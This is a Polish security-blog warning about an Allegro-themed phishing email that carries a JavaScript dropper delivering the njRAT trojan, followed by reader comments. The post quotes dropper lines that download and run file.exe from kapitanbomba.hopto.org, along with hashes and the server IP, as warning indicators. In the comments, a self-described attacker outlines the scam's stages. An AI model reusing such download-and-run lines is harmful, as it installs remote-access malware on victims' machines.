Uwaga na atak: Ticket #173 – Rekomenstana zwrot 1000zl jako zadoscuczynienie.
W ostatnich tygodniach widzimy znaczący wzrost ataków na użytkowników Allegro. Scenariuszy jest wiele – od wyłudzania haseł po instalację złośliwego oprogramowania. Poniżej opisujemy najnowszy pomysł internetowych oszustów.
Wśród setek złośliwych e-maili, które codziennie widzimy, przeważają wiadomości już dobrze nam znane. Wiele grup przestępców przez wiele tygodni, a czasem nawet miesięcy, wysyła identyczne e-maile z identycznymi załącznikami, nie starając się w ogóle zadbać o odświeżenie swojej oferty. Czasem jednak zdarzają się nowe inicjatywy, które warto opisać, by ostrzec internautów.
Ticket #173 – Rekomenstana zwrot 1000zl jako zadoscuczynienie.
Temat wiadomości pokazuje niechlujność atakujących – z reguły lepiej dbają o treść swoich ataków. Sama wiadomość wygląda następująco:
Witaj (tu adres odbiorcy),
Zgodnie z naszymi procedurami przyznalismy Tobie w ramach zwrotu, voucher na kwote 1.000zl do wydania w serwisie allegro.
twój kupon znajduje sie w zalaczniku!
Czekamy na Ciebie!
Do wiadomości dołączony jest plik
Karta Podarunkowa.z d67dfc63aba158632ab3987a80a8a05280f30ab1c9cab36c908df4e82e7dccaf https://www.virustotal.com/#/file/d67dfc63aba158632ab3987a80a8a05280f30ab1c9cab36c908df4e82e7dccaf/
zawierający w archiwum plik
zalacznik.PDF.js 6b7ba9765755d44c9f7d515502e65e15d95edea4997651288ff4b7d374792e3c https://www.virustotal.com/#/file/ad5832056e4f94846d00b01fc6aec0163bb7f2c62c0a1cc384041941a5536cf6/
Złośliwy plik JS jest zaciemniony, ale daje się łatwo odczytać. Zawiera takie ciągi:
DfL('http://kapitanbomba.hopto.org/file.exe', foul + '\\file.exe');
DfLPDF('http://kapitanbomba.hopto.org/file.pdf', foul + '\\file.pdf');
RunExe();
RunPDF();
Plik PDF jest pusty i najwyraźniej niegroźny (zapewne ma udawać błędny załącznik), z kolei plik EXE jest pełny zła i zdecydowanie groźny:
file.exe ad5832056e4f94846d00b01fc6aec0163bb7f2c62c0a1cc384041941a5536cf6 https://www.virustotal.com/#/file/ad5832056e4f94846d00b01fc6aec0163bb7f2c62c0a1cc384041941a5536cf6/
Jest to koń trojański znany jako njRAT lub Bladabindi. Korzysta z tego samego serwera, z którego jest pobierany:
kapitanbomba.hopto.org 108.62.118.179
Ataki z użyciem tego serwera i złośliwego oprogramowania prawdopodobnie trwają co najmniej od dwóch dni, jednak mała liczba zgłoszeń wskazuje, że jest to raczej kampania celowana w konkretne ofiary.
Dziękujemy Czytelnikom, którzy zgłosili kampanię – Ty też możesz pomóc!
Podobne wpisy
- CSO Grupy Allegro, Michał Wierucki, gościem Rozmowy Kontrolowanej w niedzielę o 21
- Jak jedną prostą sztuczką wyłączyliśmy przestępcom proste złośliwe oprogramowanie
- Kiedy nawet dobry EDR nie wystarcza – case study prawie udanego ataku z polskiej firmy
- Wyciekła baza ofiar producenta spyware – sprawdź, czy jest tam twój telefon
- ABW ocenzurowało stronę publikującą e-maile rządu ze skrzynki pocztowej ministra Dworczyka
Potwierdzam. Również otrzymałem taką wiadomość. Całkiem nieźle przygotowana. Sam się prawie złapałem.
Mają skądś dane kont Allegro. Przyszło dziś na e-mail, którego używam jedynie do allegro. Na pozostałe ogólnodostępne konta nic nie wysłali.
Precyzyjny atak.
Poważnie ? Musisz być chyba jednak debilem. Sorry ale od kiedy to allegro pisze do ciebie bez polskich znaków diakrytycznych ?
Poza tym sekcja użyteczne informacje też daje dużo do myślenia. Z dwa błędy wyłapałem nie wczytując się w tekst. Literówki biją po oczach. Czy allegro nagle zatrudniło dziecko z 4 klasy podstawówki ?
Niekoniecznie z allegro. Przy zakupie twój adres dostaje sprzedawca, a wielu sprzedawców ma zintegrowany sklep z allegro. Albo któryś sprzedawca świadomie przekazał dane atakującym albo oni sami wykradli je z sklepu. Więc twój e-mail tylko do allegro wcale nie jest tylko do allegro, chyba że nic jeszcze nie kupiłeś.
Znowu chakerzy ofiary reformy edukacji w Polsce.
Jeśli to serwer DNS no.ip to może atakujący jeszcze raz się na nim zaloguje. Jeśli się zaloguje to może atakujący ma zmienne IP?
Jeśli się nie zmieni w przeciągu miesiąca to może korzysta z jakiegoś hostingu? Może „Ubiquity Server Solutions Chicago” by coś więcej by powiedziało federalnym na temat IP?
Haksior dysan112 włamuje się dzieciakom i starszym osobom na czatach i policja nie może z nim nic zrobić?
>Miałem uruchomiony podsłuch w mini pc kiano slimstick, przez kilka miesięcy. Nie zorientowałem się że to małe urządzenie ma wbudowany mikrofon. Ten wbudowany antywirus w Windows 10 Defender i Avast niczego nie wykryły, dopiero inne programy wyłapały ponad 13 infekcji i trojanów. Jak się okazało mój prześladowca codziennie namierzał mnie na arabskim czacie zamtalk i tam zdobywał moje IP, prawdopodobnie złamał zabezpieczenia czata lub dostawał moje dane od zaprzyjaźnionego Pakistańczyka z którym grał w gry online. Zauważyłem, że chodzą w sieci za mną jakieś osoby po różnych, forach, portalach na których jestem i mam konto. Zaczęli tam tworzyć nicki z moim imieniem lub nazwą mojego nicka z innego forum, portalu. Podchodziło to już pod prześladowanie w sieci lub stalking. Raz bezczelnie napisał mi na priv, co wpisuje w google, co mówiłem w pokoju, prawdopodobnie przeglądał sobie mój pulpit, pisał to z nicka yumii. Powiedziałem, że mu nie odpuszczę i zacząłem go tropić, popytałem ludzi, połączyłem jego wpisy, poobserwowałem co pisze i odkryłem jego stały nick dysan112. Potem już wiedziałem co to za osoba i jaki to Windowsowy hakier. Także wiem, jak łatwo uruchomić pod Windowsem mikrofon, gdy ktoś wgra ci zdalnie trojana, ja nigdy nie wchodziłem w linki z czatów, a on jakimś sposobem podesłał mi trojana i przeglądał mój pulpit, uruchomił sobie mikrofon w tle. Dobrze, że nie miałem w tym PC kamerki, bo jeszcze ją by uruchomił.
__________
radzę ci złożyć wniosek o ściganie przestępstwa osobiście w prokuraturze. jak wysłałeś coś takiego mailem to policjant który go odebrał musiał mieć niezłą bekę
Tak z ciekawości, tego Kiano kupiłeś jako używkę czy całkowicie nowy komputer w sklepie? Robiłeś reinstalację systemu, czy jak go odpaliłeś tak nic na nim nie zmieniałeś/ nie konfigurowałeś?
Kupiłem Kiano nowy, ale potem wgrałem Linux i za jakiś czas wgrałem oryginalny Windows 10, ponieważ on ma w swoim biosie wbudowany klucz aktywujący system. Nie mogłem tylko sterowników wgrać i chyba tam na tym forum winclub ktoś wysłał sterowniki na dysk online, a ja je pobrałem i zainstalowałem. Defender i Avast jest do niczego, one nic nie wykryją nawet przy skanowaniu plików.
Cześć bochaz. Też padłem ofiarą dysana, czy mógłbyś skontaktować się ze mną przez email: ofiaradysa et mail.com
O widzę, że dysan112 się przestraszył i próbuje mnie wykpić, że będą bekę mieli z moich zeznań. Nie bój się są dowody na wszystko zebrane. Nawet poszukał moich wypowiedzi to forum co podajecie zainfekowane sterowniki też zostanie uwzględnione.
gdybym był tym przestępcą to radziłbym ci nasłać na siebie prokuraturę?
twoje wypowiedzi znalazłem w kilka sekund po wpisaniu „dysan112” w wyszukiwarkę, osint to podstawa :)
a to jak policjanci traktują nietypowe zgłoszenia to posłuchaj tutaj 12:10 https://www.youtube.com/watch?v=5QTY27ERXDg
To wejdź na taki czat paltalk lub zamtalk na których on siedzi i napisz coś do niego, to zobaczysz jak szybko ci się włamie na komputer jeżeli masz Windows, bo on tam dostaje IP ludzi. Zaraz cie będzie sprawdzał kim jesteś.
kolezce chyba atak nie wyszedl 48/56 wynik av, ratami bawilem sie jak mialem 12 latek
Czy tytuł to nie powinna być: „Rekompensata”?
Tytul bez polskich liter, a tekst artykulu juz tak.
czytałeś artykuł?
A co to znaczy „Rekomenstana zwrot 1000zl jako zadoscuczynienie.”
miejska legenda mówi że to specjalnie, żeby do następnej fazy ataku przeszły tylko nieogarnięte ofiary. bo jak inteligentna osoba pobierze plik exe i dopiero wtedy się zorientuje to większa szansa że zrobi aferę, crypt szybciej trafi na virustotala itd. ale to jakaś naciągana teoria, na miejscu przestępców nigdy bym z takich „metod” nie skorzystał
I to 'Tobie’ zamiast 'Ci’ od razu się rzuca w oczy.
Jak czytam Wasze komentarze to, aż mi Was żal. Piszecie takie glupoty, aż w głowie się nie mieści. Plik ten uruchamiał czystego PDF’a, tylko po to aby coś się włączyło. W tle uruchamiało starter do njRAT’a. Wysyłamy te maile, że się tak wyrażę na kilogramy. Nie wiemy do kogo to idzie. Jak napatoczy się ofiara, sprawdzamy czy ma coś fajnego na komputerze, jeżeli tak przerzucamy na inne serwery i albo szyfrujemy pliki za okup, ewentualnie ściagamy wasze dokumenty tożsamości i sprzedajemy dalej. Czasem się trafi człowiek kret, który sam oddaje siano, np. józef który dzięki oknie czatu myślał że pisze z bankiem i zmienił numer tele do autoryzacji na nasz. Wyławiamy tylko najgłupszych. Pozdrawiam
imponujące. ile zarabiacie? udało się kiedyś jakąś firmę, urząd czy tylko takie józefy?
„imponujące” złodziejstwo i amatorka, pseudo haker z ciebie i żałosny typ skoro nie potrafisz zarobić fajnych pieniedzy z normalnego interesu. wystarczy jeden błąd i bedziesz siedział w pierdlu, minuta nieuwagi i braku koncentracji i pojdziesz siedziec na pare lat za tych wszystkich ludzi i życze ci tego jak najszybciej.
Droga redakcjo, poprawcie proszę literówki. Słownik języka polskiego nie zna „Rekomenstana” ;)
Pozdrawiam!
Drogi Czytelniku, przeczytaj dokładnie artykuł. Albo chociaż pobieżnie.